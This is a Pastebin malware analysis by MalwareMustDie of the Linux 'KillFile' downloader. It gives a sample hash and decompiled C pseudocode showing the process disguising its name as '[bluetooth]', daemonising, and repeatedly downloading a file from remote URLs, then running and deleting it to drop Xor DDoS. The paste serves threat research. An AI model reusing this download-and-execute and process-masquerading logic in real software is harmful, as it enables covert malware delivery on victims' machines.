Ledger Nano X - The secure hardware wallet
SHARE
TWEET

Linux/KillFile

MalwareMustDie Apr 17th, 2014 (edited) 1,054 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Linux/KillFile  (made in China)
  2. It downloaded and execute the Xor DDoS filelessly
  3.  
  4. hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VT)
  5.  
  6. Reverse result:
  7.  
  8. void main(int a1, char arg2)
  9. {
  10.   size_t var_length_procname; from EAX
  11.  
  12.   var_length_procname = strlen(*arg2);
  13.   memset(*arg2, 0, var_length_procname);
  14.   memcpy(*arg2, "[bluetooth]", 0xCu);
  15.   daemon(1, 0);
  16.   nice(-20);
  17.   while ( 1 )
  18.   {
  19.     if ( kill_time > 4 )
  20.     {
  21.       kill_time = 0;
  22.       killfileandpid();
  23.       RunFile();
  24.     }
  25.     ++kill_time;
  26.     sleep(1);
  27.   }
  28. }
  29.  
  30. __pid_t killfileandpid()
  31. {
  32.   __pid_t result; from EAX
  33.  
  34.   result = fork();
  35.   if ( result >= 0 )
  36.   {
  37.     if ( !result )
  38.     {
  39.       setsid();
  40.       umask(0);
  41.       KillProcess();
  42.     }
  43.     result = wait(0);
  44.   }
  45.   return result;
  46. }
  47.  
  48. void __noreturn KillProcess()
  49. {
  50.   int v0;
  51.   char s[10240];
  52.   int i;
  53.  
  54.   memset(s, 0, 0x2800); // buffer for file
  55.   memset(&v0, 0, 0x2800); // buffer for mem
  56.   for ( i = 0; ; ++i )
  57.   {
  58.     if ( i > 3 )
  59.       _exit(0);
  60.     sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt");
  61.     if ( http_download(&v0, s, 0) ) //  forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s
  62.       break;
  63.   }
  64.   if ( s[strlen(s) - 1] == 10 )
  65.     s[strlen(s) - 1] = 0;
  66.   GetProcess(s);  // use proc/exec to execute downloaded file and delete the file after exec
  67.   _exit(0);
  68. }
  69.  
  70. @unixfreaxjp #MalwareMustDie
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top